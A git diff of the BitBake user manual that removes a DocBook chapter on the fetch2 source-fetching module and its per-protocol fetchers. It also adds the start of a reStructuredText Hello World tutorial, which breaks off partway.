- and files from remote systems.
- Fetching source code is one of the cornerstones of building software.
- As such, this module forms an important part of BitBake.
- </para>
-
- <para>
- The current fetch module is called "fetch2" and refers to the
- fact that it is the second major version of the API.
- The original version is obsolete and has been removed from the codebase.
- Thus, in all cases, "fetch" refers to "fetch2" in this
- manual.
- </para>
-
- <section id='the-download-fetch'>
- <title>The Download (Fetch)</title>
-
- <para>
- BitBake takes several steps when fetching source code or files.
- The fetcher codebase deals with two distinct processes in order:
- obtaining the files from somewhere (cached or otherwise)
- and then unpacking those files into a specific location and
- perhaps in a specific way.
- Getting and unpacking the files is often optionally followed
- by patching.
- Patching, however, is not covered by this module.
- </para>
-
- <para>
- The code to execute the first part of this process, a fetch,
- looks something like the following:
- <literallayout class='monospaced'>
- src_uri = (d.getVar('SRC_URI') or "").split()
- fetcher = bb.fetch2.Fetch(src_uri, d)
- fetcher.download()
- </literallayout>
- This code sets up an instance of the fetch class.
- The instance uses a space-separated list of URLs from the
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
- variable and then calls the <filename>download</filename>
- method to download the files.
- </para>
-
- <para>
- The instantiation of the fetch class is usually followed by:
- <literallayout class='monospaced'>
- rootdir = l.getVar('WORKDIR')
- fetcher.unpack(rootdir)
- </literallayout>
- This code unpacks the downloaded files to the
- specified by <filename>WORKDIR</filename>.
- <note>
- For convenience, the naming in these examples matches
- the variables used by OpenEmbedded.
- If you want to see the above code in action, examine
- the OpenEmbedded class file <filename>base.bbclass</filename>.
- </note>
- The <filename>SRC_URI</filename> and <filename>WORKDIR</filename>
- variables are not hardcoded into the fetcher, since those fetcher
- methods can be (and are) called with different variable names.
- In OpenEmbedded for example, the shared state (sstate) code uses
- the fetch module to fetch the sstate files.
- </para>
-
- <para>
- When the <filename>download()</filename> method is called,
- BitBake tries to resolve the URLs by looking for source files
- in a specific search order:
- <itemizedlist>
- <listitem><para><emphasis>Pre-mirror Sites:</emphasis>
- BitBake first uses pre-mirrors to try and find source files.
- These locations are defined using the
- <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- variable.
- </para></listitem>
- <listitem><para><emphasis>Source URI:</emphasis>
- If pre-mirrors fail, BitBake uses the original URL (e.g from
- <filename>SRC_URI</filename>).
- </para></listitem>
- <listitem><para><emphasis>Mirror Sites:</emphasis>
- If fetch failures occur, BitBake next uses mirror locations as
- defined by the
- <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>
- variable.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For each URL passed to the fetcher, the fetcher
- calls the submodule that handles that particular URL type.
- This behavior can be the source of some confusion when you
- are providing URLs for the <filename>SRC_URI</filename>
- variable.
- Consider the following two URLs:
- <literallayout class='monospaced'>
- http://git.yoctoproject.org/git/poky;protocol=git
- git://git.yoctoproject.org/git/poky;protocol=http
- </literallayout>
- In the former case, the URL is passed to the
- <filename>wget</filename> fetcher, which does not
- understand "git".
- Therefore, the latter case is the correct form since the
- Git fetcher does know how to use HTTP as a transport.
- </para>
-
- <para>
- Here are some examples that show commonly used mirror
- definitions:
- <literallayout class='monospaced'>
- PREMIRRORS ?= "\
- bzr://.*/.* http://somemirror.org/sources/ \n \
- cvs://.*/.* http://somemirror.org/sources/ \n \
- git://.*/.* http://somemirror.org/sources/ \n \
- hg://.*/.* http://somemirror.org/sources/ \n \
- osc://.*/.* http://somemirror.org/sources/ \n \
- p4://.*/.* http://somemirror.org/sources/ \n \
- svn://.*/.* http://somemirror.org/sources/ \n"
-
- MIRRORS =+ "\
- ftp://.*/.* http://somemirror.org/sources/ \n \
- http://.*/.* http://somemirror.org/sources/ \n \
- https://.*/.* http://somemirror.org/sources/ \n"
- </literallayout>
- It is useful to note that BitBake supports
- cross-URLs.
- It is possible to mirror a Git repository on an HTTP
- server as a tarball.
- This is what the <filename>git://</filename> mapping in
- the previous example does.
- </para>
-
- <para>
- Since network accesses are slow, BitBake maintains a
- cache of files downloaded from the network.
- Any source files that are not local (i.e.
- downloaded from the Internet) are placed into the download
- directory, which is specified by the
- <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
- variable.
- </para>
-
- <para>
- File integrity is of key importance for reproducing builds.
- For non-local archive downloads, the fetcher code can verify
- SHA-256 and MD5 checksums to ensure the archives have been
- downloaded correctly.
- You can specify these checksums by using the
- <filename>SRC_URI</filename> variable with the appropriate
- varflags as follows:
- <literallayout class='monospaced'>
- SRC_URI[md5sum] = "<replaceable>value</replaceable>"
- SRC_URI[sha256sum] = "<replaceable>value</replaceable>"
- </literallayout>
- You can also specify the checksums as parameters on the
- <filename>SRC_URI</filename> as shown below:
- <literallayout class='monospaced'>
- SRC_URI = "http://example.com/foobar.tar.bz2;md5sum=4a8e0f237e961fd7785d19d07fdb994d"
- </literallayout>
- If multiple URIs exist, you can specify the checksums either
- directly as in the previous example, or you can name the URLs.
- The following syntax shows how you name the URIs:
- <literallayout class='monospaced'>
- SRC_URI = "http://example.com/foobar.tar.bz2;name=foo"
- SRC_URI[foo.md5sum] = 4a8e0f237e961fd7785d19d07fdb994d
- </literallayout>
- After a file has been downloaded and has had its checksum checked,
- a ".done" stamp is placed in <filename>DL_DIR</filename>.
- BitBake uses this stamp during subsequent builds to avoid
- downloading or comparing a checksum for the file again.
- <note>
- It is assumed that local storage is safe from data corruption.
- If this were not the case, there would be bigger issues to worry about.
- </note>
- </para>
-
- <para>
- If
- <link linkend='var-bb-BB_STRICT_CHECKSUM'><filename>BB_STRICT_CHECKSUM</filename></link>
- is set, any download without a checksum triggers an
- error message.
- The
- <link linkend='var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></link>
- variable can be used to make any attempted network access a fatal
- error, which is useful for checking that mirrors are complete
- as well as other things.
- </para>
- </section>
-
- <section id='bb-the-unpack'>
- <title>The Unpack</title>
-
- <para>
- The unpack process usually immediately follows the download.
- For all URLs except Git URLs, BitBake uses the common
- <filename>unpack</filename> method.
- </para>
-
- <para>
- A number of parameters exist that you can specify within the
- URL to govern the behavior of the unpack stage:
- <itemizedlist>
- <listitem><para><emphasis>unpack:</emphasis>
- Controls whether the URL components are unpacked.
- If set to "1", which is the default, the components
- are unpacked.
- If set to "0", the unpack stage leaves the file alone.
- This parameter is useful when you want an archive to be
- copied in and not be unpacked.
- </para></listitem>
- <listitem><para><emphasis>dos:</emphasis>
- Applies to <filename>.zip</filename> and
- <filename>.jar</filename> files and specifies whether to
- use DOS line ending conversion on text files.
- </para></listitem>
- <listitem><para><emphasis>basepath:</emphasis>
- Instructs the unpack stage to strip the specified
- directories from the source path when unpacking.
- </para></listitem>
- <listitem><para><emphasis>subdir:</emphasis>
- Unpacks the specific URL to the specified subdirectory
- within the root directory.
- </para></listitem>
- </itemizedlist>
- The unpack call automatically decompresses and extracts files
- with ".Z", ".z", ".gz", ".xz", ".zip", ".jar", ".ipk", ".rpm".
- ".srpm", ".deb" and ".bz2" extensions as well as various combinations
- of tarball extensions.
- </para>
-
- <para>
- As mentioned, the Git fetcher has its own unpack method that
- is optimized to work with Git trees.
- Basically, this method works by cloning the tree into the final
- directory.
- The process is completed using references so that there is
- only one central copy of the Git metadata needed.
- </para>
- </section>
-
- <section id='bb-fetchers'>
- <title>Fetchers</title>
-
- <para>
- As mentioned earlier, the URL prefix determines which
- fetcher submodule BitBake uses.
- Each submodule can support different URL parameters,
- which are described in the following sections.
- </para>
-
- <section id='local-file-fetcher'>
- <title>Local file fetcher (<filename>file://</filename>)</title>
-
- <para>
- This submodule handles URLs that begin with
- <filename>file://</filename>.
- The filename you specify within the URL can be
- either an absolute or relative path to a file.
- If the filename is relative, the contents of the
- <link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>
- variable is used in the same way
- <filename>PATH</filename> is used to find executables.
- If the file cannot be found, it is assumed that it is available in
- <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
- by the time the <filename>download()</filename> method is called.
- </para>
-
- <para>
- If you specify a directory, the entire directory is
- unpacked.
- </para>
-
- <para>
- Here are a couple of example URLs, the first relative and
- the second absolute:
- <literallayout class='monospaced'>
- SRC_URI = "file://relativefile.patch"
- SRC_URI = "file:///Users/ich/very_important_software"
- </literallayout>
- </para>
- </section>
-
- <section id='http-ftp-fetcher'>
- <title>HTTP/FTP wget fetcher (<filename>http://</filename>, <filename>ftp://</filename>, <filename>https://</filename>)</title>
-
- <para>
- This fetcher obtains files from web and FTP servers.
- Internally, the fetcher uses the wget utility.
- </para>
-
- <para>
- The executable and parameters used are specified by the
- <filename>FETCHCMD_wget</filename> variable, which defaults
- to sensible values.
- The fetcher supports a parameter "downloadfilename" that
- allows the name of the downloaded file to be specified.
- Specifying the name of the downloaded file is useful
- for avoiding collisions in
- <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
- when dealing with multiple files that have the same name.
- </para>
-
- <para>
- Some example URLs are as follows:
- <literallayout class='monospaced'>
- SRC_URI = "http://oe.handhelds.org/not_there.aac"
- SRC_URI = "ftp://oe.handhelds.org/not_there_as_well.aac"
- SRC_URI = "ftp://you@oe.handhelds.org/home/you/secret.plan"
- </literallayout>
- </para>
- <note>
- Because URL parameters are delimited by semi-colons, this can
- introduce ambiguity when parsing URLs that also contain semi-colons,
- for example:
- <literallayout class='monospaced'>
- SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git;a=snapshot;h=a5dd47"
- </literallayout>
- Such URLs should should be modified by replacing semi-colons with '&amp;' characters:
- <literallayout class='monospaced'>
- SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&amp;a=snapshot&amp;h=a5dd47"
- </literallayout>
- In most cases this should work. Treating semi-colons and '&amp;' in queries
- identically is recommended by the World Wide Web Consortium (W3C).
- Note that due to the nature of the URL, you may have to specify the name
- of the downloaded file as well:
- <literallayout class='monospaced'>
- SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&amp;a=snapshot&amp;h=a5dd47;downloadfilename=myfile.bz2"
- </literallayout>
- </note>
- </section>
-
- <section id='cvs-fetcher'>
- <title>CVS fetcher (<filename>(cvs://</filename>)</title>
-
- <para>
- This submodule handles checking out files from the
- CVS version control system.
- You can configure it using a number of different variables:
- <itemizedlist>
- <listitem><para><emphasis><filename>FETCHCMD_cvs</filename>:</emphasis>
- The name of the executable to use when running
- the <filename>cvs</filename> command.
- This name is usually "cvs".
- </para></listitem>
- <listitem><para><emphasis><filename>SRCDATE</filename>:</emphasis>
- The date to use when fetching the CVS source code.
- A special value of "now" causes the checkout to
- be updated on every build.
- </para></listitem>
- <listitem><para><emphasis><link linkend='var-bb-CVSDIR'><filename>CVSDIR</filename></link>:</emphasis>
- Specifies where a temporary checkout is saved.
- The location is often <filename>DL_DIR/cvs</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>CVS_PROXY_HOST</filename>:</emphasis>
- The name to use as a "proxy=" parameter to the
- <filename>cvs</filename> command.
- </para></listitem>
- <listitem><para><emphasis><filename>CVS_PROXY_PORT</filename>:</emphasis>
- The port number to use as a "proxyport=" parameter to
- the <filename>cvs</filename> command.
- </para></listitem>
- </itemizedlist>
- As well as the standard username and password URL syntax,
- you can also configure the fetcher with various URL parameters:
- </para>
-
- <para>
- The supported parameters are as follows:
- <itemizedlist>
- <listitem><para><emphasis>"method":</emphasis>
- The protocol over which to communicate with the CVS
- server.
- By default, this protocol is "pserver".
- If "method" is set to "ext", BitBake examines the
- "rsh" parameter and sets <filename>CVS_RSH</filename>.
- You can use "dir" for local directories.
- </para></listitem>
- <listitem><para><emphasis>"module":</emphasis>
- Specifies the module to check out.
- You must supply this parameter.
- </para></listitem>
- <listitem><para><emphasis>"tag":</emphasis>
- Describes which CVS TAG should be used for
- the checkout.
- By default, the TAG is empty.
- </para></listitem>
- <listitem><para><emphasis>"date":</emphasis>
- Specifies a date.
- If no "date" is specified, the
- <link linkend='var-bb-SRCDATE'><filename>SRCDATE</filename></link>
- of the configuration is used to checkout a specific date.
- The special value of "now" causes the checkout to be
- updated on every build.
- </para></listitem>
- <listitem><para><emphasis>"localdir":</emphasis>
- Used to rename the module.
- Effectively, you are renaming the output directory
- to which the module is unpacked.
- You are forcing the module into a special
- directory relative to
- <link linkend='var-bb-CVSDIR'><filename>CVSDIR</filename></link>.
- </para></listitem>
- <listitem><para><emphasis>"rsh"</emphasis>
- Used in conjunction with the "method" parameter.
- </para></listitem>
- <listitem><para><emphasis>"scmdata":</emphasis>
- Causes the CVS metadata to be maintained in the tarball
- the fetcher creates when set to "keep".
- The tarball is expanded into the work directory.
- By default, the CVS metadata is removed.
- </para></listitem>
- <listitem><para><emphasis>"fullpath":</emphasis>
- Controls whether the resulting checkout is at the
- module level, which is the default, or is at deeper
- paths.
- </para></listitem>
- <listitem><para><emphasis>"norecurse":</emphasis>
- Causes the fetcher to only checkout the specified
- directory with no recurse into any subdirectories.
- </para></listitem>
- <listitem><para><emphasis>"port":</emphasis>
- The port to which the CVS server connects.
- </para></listitem>
- </itemizedlist>
- Some example URLs are as follows:
- <literallayout class='monospaced'>
- SRC_URI = "cvs://CVSROOT;module=mymodule;tag=some-version;method=ext"
- SRC_URI = "cvs://CVSROOT;module=mymodule;date=20060126;localdir=usethat"
- </literallayout>
- </para>
- </section>
-
- <section id='svn-fetcher'>
- <title>Subversion (SVN) Fetcher (<filename>svn://</filename>)</title>
-
- <para>
- This fetcher submodule fetches code from the
- Subversion source control system.
- The executable used is specified by
- <filename>FETCHCMD_svn</filename>, which defaults
- to "svn".
- The fetcher's temporary working directory is set by
- <link linkend='var-bb-SVNDIR'><filename>SVNDIR</filename></link>,
- which is usually <filename>DL_DIR/svn</filename>.
- </para>
-
- <para>
- The supported parameters are as follows:
- <itemizedlist>
- <listitem><para><emphasis>"module":</emphasis>
- The name of the svn module to checkout.
- You must provide this parameter.
- You can think of this parameter as the top-level
- directory of the repository data you want.
- </para></listitem>
- <listitem><para><emphasis>"path_spec":</emphasis>
- A specific directory in which to checkout the
- specified svn module.
- </para></listitem>
- <listitem><para><emphasis>"protocol":</emphasis>
- The protocol to use, which defaults to "svn".
- If "protocol" is set to "svn+ssh", the "ssh"
- parameter is also used.
- </para></listitem>
- <listitem><para><emphasis>"rev":</emphasis>
- The revision of the source code to checkout.
- </para></listitem>
- <listitem><para><emphasis>"scmdata":</emphasis>
- Causes the “.svn†directories to be available during
- compile-time when set to "keep".
- By default, these directories are removed.
- </para></listitem>
- <listitem><para><emphasis>"ssh":</emphasis>
- An optional parameter used when "protocol" is set
- to "svn+ssh".
- You can use this parameter to specify the ssh
- program used by svn.
- </para></listitem>
- <listitem><para><emphasis>"transportuser":</emphasis>
- When required, sets the username for the transport.
- By default, this parameter is empty.
- The transport username is different than the username
- used in the main URL, which is passed to the subversion
- command.
- </para></listitem>
- </itemizedlist>
- Following are three examples using svn:
- <literallayout class='monospaced'>
- SRC_URI = "svn://myrepos/proj1;module=vip;protocol=http;rev=667"
- SRC_URI = "svn://myrepos/proj1;module=opie;protocol=svn+ssh"
- SRC_URI = "svn://myrepos/proj1;module=trunk;protocol=http;path_spec=${MY_DIR}/proj1"
- </literallayout>
- </para>
- </section>
-
- <section id='git-fetcher'>
- <title>Git Fetcher (<filename>git://</filename>)</title>
-
- <para>
- This fetcher submodule fetches code from the Git
- source control system.
- The fetcher works by creating a bare clone of the
- remote into
- <link linkend='var-bb-GITDIR'><filename>GITDIR</filename></link>,
- which is usually <filename>DL_DIR/git2</filename>.
- This bare clone is then cloned into the work directory during the
- unpack stage when a specific tree is checked out.
- This is done using alternates and by reference to
- minimize the amount of duplicate data on the disk and
- make the unpack process fast.
- The executable used can be set with
- <filename>FETCHCMD_git</filename>.
- </para>
-
- <para>
- This fetcher supports the following parameters:
- <itemizedlist>
- <listitem><para><emphasis>"protocol":</emphasis>
- The protocol used to fetch the files.
- The default is "git" when a hostname is set.
- If a hostname is not set, the Git protocol is "file".
- You can also use "http", "https", "ssh" and "rsync".
- </para></listitem>
- <listitem><para><emphasis>"nocheckout":</emphasis>
- Tells the fetcher to not checkout source code when
- unpacking when set to "1".
- Set this option for the URL where there is a custom
- routine to checkout code.
- The default is "0".
- </para></listitem>
- <listitem><para><emphasis>"rebaseable":</emphasis>
- Indicates that the upstream Git repository can be rebased.
- You should set this parameter to "1" if
- revisions can become detached from branches.
- In this case, the source mirror tarball is done per
- revision, which has a loss of efficiency.
- Rebasing the upstream Git repository could cause the
- current revision to disappear from the upstream repository.
- This option reminds the fetcher to preserve the local cache
- carefully for future use.
- The default value for this parameter is "0".
- </para></listitem>
- <listitem><para><emphasis>"nobranch":</emphasis>
- Tells the fetcher to not check the SHA validation
- for the branch when set to "1".
- The default is "0".
- Set this option for the recipe that refers to
- the commit that is valid for a tag instead of
- the branch.
- </para></listitem>
- <listitem><para><emphasis>"bareclone":</emphasis>
- Tells the fetcher to clone a bare clone into the
- destination directory without checking out a working tree.
- Only the raw Git metadata is provided.
- This parameter implies the "nocheckout" parameter as well.
- </para></listitem>
- <listitem><para><emphasis>"branch":</emphasis>
- The branch(es) of the Git tree to clone.
- If unset, this is assumed to be "master".
- The number of branch parameters much match the number of
- name parameters.
- </para></listitem>
- <listitem><para><emphasis>"rev":</emphasis>
- The revision to use for the checkout.
- The default is "master".
- </para></listitem>
- <listitem><para><emphasis>"tag":</emphasis>
- Specifies a tag to use for the checkout.
- To correctly resolve tags, BitBake must access the
- network.
- For that reason, tags are often not used.
- As far as Git is concerned, the "tag" parameter behaves
- effectively the same as the "rev" parameter.
- </para></listitem>
- <listitem><para><emphasis>"subpath":</emphasis>
- Limits the checkout to a specific subpath of the tree.
- By default, the whole tree is checked out.
- </para></listitem>
- <listitem><para><emphasis>"destsuffix":</emphasis>
- The name of the path in which to place the checkout.
- By default, the path is <filename>git/</filename>.
- </para></listitem>
- <listitem><para><emphasis>"usehead":</emphasis>
- Enables local <filename>git://</filename> URLs to use the
- current branch HEAD as the revision for use with
- <filename>AUTOREV</filename>.
- The "usehead" parameter implies no branch and only works
- when the transfer protocol is
- <filename>file://</filename>.
- </para></listitem>
- </itemizedlist>
- Here are some example URLs:
- <literallayout class='monospaced'>
- SRC_URI = "git://git.oe.handhelds.org/git/vip.git;tag=version-1"
- SRC_URI = "git://git.oe.handhelds.org/git/vip.git;protocol=http"
- </literallayout>
- </para>
- </section>
-
- <section id='gitsm-fetcher'>
- <title>Git Submodule Fetcher (<filename>gitsm://</filename>)</title>
-
- <para>
- This fetcher submodule inherits from the
- <link linkend='git-fetcher'>Git fetcher</link> and extends
- that fetcher's behavior by fetching a repository's submodules.
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
- is passed to the Git fetcher as described in the
- "<link linkend='git-fetcher'>Git Fetcher (<filename>git://</filename>)</link>"
- section.
- <note>
- <title>Notes and Warnings</title>
- <para>
- You must clean a recipe when switching between
- '<filename>git://</filename>' and
- '<filename>gitsm://</filename>' URLs.
- </para>
-
- <para>
- The Git Submodules fetcher is not a complete fetcher
- implementation.
- The fetcher has known issues where it does not use the
- normal source mirroring infrastructure properly. Further,
- the submodule sources it fetches are not visible to the
- licensing and source archiving infrastructures.
- </para>
- </note>
- </para>
- </section>
-
- <section id='clearcase-fetcher'>
- <title>ClearCase Fetcher (<filename>ccrc://</filename>)</title>
-
- <para>
- This fetcher submodule fetches code from a
- <ulink url='http://en.wikipedia.org/wiki/Rational_ClearCase'>ClearCase</ulink>
- repository.
- </para>
-
- <para>
- To use this fetcher, make sure your recipe has proper
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>,
- <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>, and
- <link linkend='var-bb-PV'><filename>PV</filename></link> settings.
- Here is an example:
- <literallayout class='monospaced'>
- SRC_URI = "ccrc://cc.example.org/ccrc;vob=/example_vob;module=/example_module"
- SRCREV = "EXAMPLE_CLEARCASE_TAG"
- PV = "${@d.getVar("SRCREV", False).replace("/", "+")}"
- </literallayout>
- The fetcher uses the <filename>rcleartool</filename> or
- <filename>cleartool</filename> remote client, depending on
- which one is available.
- </para>
-
- <para>
- Following are options for the <filename>SRC_URI</filename>
- statement:
- <itemizedlist>
- <listitem><para><emphasis><filename>vob</filename></emphasis>:
- The name, which must include the
- prepending "/" character, of the ClearCase VOB.
- This option is required.
- </para></listitem>
- <listitem><para><emphasis><filename>module</filename></emphasis>:
- The module, which must include the
- prepending "/" character, in the selected VOB.
- <note>
- The <filename>module</filename> and <filename>vob</filename>
- options are combined to create the <filename>load</filename> rule in
- the view config spec.
- As an example, consider the <filename>vob</filename> and
- <filename>module</filename> values from the
- <filename>SRC_URI</filename> statement at the start of this section.
- Combining those values results in the following:
- <literallayout class='monospaced'>
- load /example_vob/example_module
- </literallayout>
- </note>
- </para></listitem>
- <listitem><para><emphasis><filename>proto</filename></emphasis>:
- The protocol, which can be either <filename>http</filename> or
- <filename>https</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- By default, the fetcher creates a configuration specification.
- If you want this specification written to an area other than the default,
- use the <filename>CCASE_CUSTOM_CONFIG_SPEC</filename> variable
- in your recipe to define where the specification is written.
- <note>
- the <filename>SRCREV</filename> loses its functionality if you
- specify this variable.
- However, <filename>SRCREV</filename> is still used to label the
- archive after a fetch even though it does not define what is
- fetched.
- </note>
- </para>
-
- <para>
- Here are a couple of other behaviors worth mentioning:
- <itemizedlist>
- <listitem><para>
- When using <filename>cleartool</filename>, the login of
- <filename>cleartool</filename> is handled by the system.
- The login require no special steps.
- </para></listitem>
- <listitem><para>
- In order to use <filename>rcleartool</filename> with authenticated
- users, an "rcleartool login" is necessary before using the fetcher.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='perforce-fetcher'>
- <title>Perforce Fetcher (<filename>p4://</filename>)</title>
-
- <para>
- This fetcher submodule fetches code from the
- <ulink url='https://www.perforce.com/'>Perforce</ulink>
- source control system.
- The executable used is specified by
- <filename>FETCHCMD_p4</filename>, which defaults
- to "p4".
- The fetcher's temporary working directory is set by
- <link linkend='var-bb-P4DIR'><filename>P4DIR</filename></link>,
- which defaults to "DL_DIR/p4".
- </para>
-
- <para>
- To use this fetcher, make sure your recipe has proper
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>,
- <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>, and
- <link linkend='var-bb-PV'><filename>PV</filename></link> values.
- The p4 executable is able to use the config file defined by your
- system's <filename>P4CONFIG</filename> environment variable in
- order to define the Perforce server URL and port, username, and
- password if you do not wish to keep those values in a recipe
- itself.
- If you choose not to use <filename>P4CONFIG</filename>,
- or to explicitly set variables that <filename>P4CONFIG</filename>
- can contain, you can specify the <filename>P4PORT</filename> value,
- which is the server's URL and port number, and you can
- specify a username and password directly in your recipe within
- <filename>SRC_URI</filename>.
- </para>
-
- <para>
- Here is an example that relies on <filename>P4CONFIG</filename>
- to specify the server URL and port, username, and password, and
- fetches the Head Revision:
- <literallayout class='monospaced'>
- SRC_URI = "p4://example-depot/main/source/..."
- SRCREV = "${AUTOREV}"
- PV = "p4-${SRCPV}"
- S = "${WORKDIR}/p4"
- </literallayout>
- </para>
-
- <para>
- Here is an example that specifies the server URL and port,
- username, and password, and fetches a Revision based on a Label:
- <literallayout class='monospaced'>
- P4PORT = "tcp:p4server.example.net:1666"
- SRC_URI = "p4://user:passwd@example-depot/main/source/..."
- SRCREV = "release-1.0"
- PV = "p4-${SRCPV}"
- S = "${WORKDIR}/p4"
- </literallayout>
- <note>
- You should always set <filename>S</filename>
- to <filename>"${WORKDIR}/p4"</filename> in your recipe.
- </note>
- </para>
- </section>
-
- <section id='repo-fetcher'>
- <title>Repo Fetcher (<filename>repo://</filename>)</title>
-
- <para>
- This fetcher submodule fetches code from
- <filename>google-repo</filename> source control system.
- The fetcher works by initiating and syncing sources of the
- repository into
- <link linkend='var-bb-REPODIR'><filename>REPODIR</filename></link>,
- which is usually
- <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link><filename>/repo</filename>.
- </para>
-
- <para>
- This fetcher supports the following parameters:
- <itemizedlist>
- <listitem><para>
- <emphasis>"protocol":</emphasis>
- Protocol to fetch the repository manifest (default: git).
- </para></listitem>
- <listitem><para>
- <emphasis>"branch":</emphasis>
- Branch or tag of repository to get (default: master).
- </para></listitem>
- <listitem><para>
- <emphasis>"manifest":</emphasis>
- Name of the manifest file (default: <filename>default.xml</filename>).
- </para></listitem>
- </itemizedlist>
- Here are some example URLs:
- <literallayout class='monospaced'>
- SRC_URI = "repo://REPOROOT;protocol=git;branch=some_branch;manifest=my_manifest.xml"
- SRC_URI = "repo://REPOROOT;protocol=file;branch=some_branch;manifest=my_manifest.xml"
- </literallayout>
- </para>
- </section>
-
- <section id='other-fetchers'>
- <title>Other Fetchers</title>
-
- <para>
- Fetch submodules also exist for the following:
- <itemizedlist>
- <listitem><para>
- Bazaar (<filename>bzr://</filename>)
- </para></listitem>
- <listitem><para>
- Mercurial (<filename>hg://</filename>)
- </para></listitem>
- <listitem><para>
- npm (<filename>npm://</filename>)
- </para></listitem>
- <listitem><para>
- OSC (<filename>osc://</filename>)
- </para></listitem>
- <listitem><para>
- Secure FTP (<filename>sftp://</filename>)
- </para></listitem>
- <listitem><para>
- Secure Shell (<filename>ssh://</filename>)
- </para></listitem>
- <listitem><para>
- Trees using Git Annex (<filename>gitannex://</filename>)
- </para></listitem>
- </itemizedlist>
- No documentation currently exists for these lesser used
- fetcher submodules.
- However, you might find the code helpful and readable.
- </para>
- </section>
- </section>
-
- <section id='auto-revisions'>
- <title>Auto Revisions</title>
-
- <para>
- We need to document <filename>AUTOREV</filename> and
- <filename>SRCREV_FORMAT</filename> here.
- </para>
- </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst
new file mode 100644
index 0000000000..e3fd321588
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst
@@ -0,0 +1,415 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+===================
+Hello World Example
+===================
+
+BitBake Hello World
+===================
+
+The simplest example commonly used to demonstrate any new programming
+language or tool is the "`Hello
+World <http://en.wikipedia.org/wiki/Hello_world_program>`__" example.
+This appendix demonstrates, in tutorial form, Hello World within the
+context of BitBake. The tutorial describes how to create a new project
+and the applicable metadata files necessary to allow BitBake to build
+it.
+
+Obtaining BitBake
+=================
+
+See the :ref:`bitbake-user-manual/bitbake-user-manual-hello:obtaining bitbake` section for
+information on how to obtain BitBake. Once you have the source code on
+your machine, the BitBake directory appears as follows: ::
+
+ $ ls -al
+ total 100
+ drwxrwxr-x. 9 wmat wmat 4096 Jan 31 13:44 .
+ drwxrwxr-x. 3 wmat wmat 4096 Feb 4 10:45 ..
+ -rw-rw-r--. 1 wmat wmat 365 Nov 26 04:55 AUTHORS
+ drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 bin
+ drwxrwxr-x. 4 wmat wmat 4096 Jan 31 13:44 build
+ -rw-rw-r--. 1 wmat wmat 16501 Nov 26 04:55 ChangeLog
+ drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 classes
+ drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 conf
+ drwxrwxr-x. 3 wmat wmat 4096 Nov 26 04:55 contrib
+ -rw-rw-r--. 1 wmat wmat 17987 Nov 26 04:55 COPYING
+ drwxrwxr-x. 3 wmat wmat 4096 Nov 26 04:55 doc
+ -rw-rw-r--. 1 wmat wmat 69 Nov 26 04:55 .gitignore
+ -rw-rw-r--. 1 wmat wmat 849 Nov 26 04:55 HEADER
+ drwxrwxr-x. 5 wmat wmat 4096 Jan 31 13:44 lib
+ -rw-rw-r--. 1 wmat wmat 195 Nov 26 04:55 MANIFEST.in
+ -rw-rw-r--. 1 wmat wmat 2887 Nov 26 04:55 TODO
+
+At this point, you should have BitBake cloned to a directory that
+matches the previous listing except for dates and user names.
+
+Setting Up the BitBake Environment
+==================================
+
+First, you need to be sure that you can run BitBake. Set your working
+directory to where your local BitBake files are and run the following
+command: ::
+
+ $ ./bin/bitbake --version
+ BitBake Build Tool Core version 1.23.0, bitbake version 1.23.0
+
+The console output tells you what version
+you are running.
+
+The recommended method to run BitBake is from a directory of your
+choice. To be able to run BitBake from any directory, you need to add
+the executable binary to your binary to your shell's environment
+``PATH`` variable. First, look at your current ``PATH`` variable by
+entering the following: ::
+
+ $ echo $PATH
+
+Next, add the directory location
+for the BitBake binary to the ``PATH``. Here is an example that adds the
+``/home/scott-lenovo/bitbake/bin`` directory to the front of the
+``PATH`` variable: ::
+
+ $ export PATH=/home/scott-lenovo/bitbake/bin:$PATH
+
+You should now be able to enter the ``bitbake`` command from the command
+line while working from any directory.
+
+The Hello World Example
+=======================
+
+The overall goal of this exercise is to build a complete "Hello World"
+example utilizing task and layer concepts. Because this is how modern
+projects such as OpenEmbedded and the Yocto Project utilize BitBake, the
+example provides an excellent starting point for understanding BitBake.
+
+To help you understand how to use BitBake to build targets, the example
+starts with nothing but the ``bitbake`` command, which causes BitBake to
+fail and report problems. The example progresses by adding pieces to the
+build to eventually conclude with a working, minimal "Hello World"
+example.
+
+While every attempt is made to explain what is happening during the
+example, the descriptions cannot cover everything. You can find further
+information throughout this manual. Also, you can actively participate
+in the :oe_lists:`/g/bitbake-devel`
+discussion mailing list about the BitBake build tool.
+
+.. note::
+
+ This example was inspired by and drew heavily from
+ `Mailing List post - The BitBake equivalent of "Hello, World!"
+ <http://www.mail-archive.com/yocto@yoctoproject.org/msg09379.html>`_.
+
+As stated earlier, the goal of this example is to eventually compile
+"Hello World". However, it is unknown what BitBake needs and what you
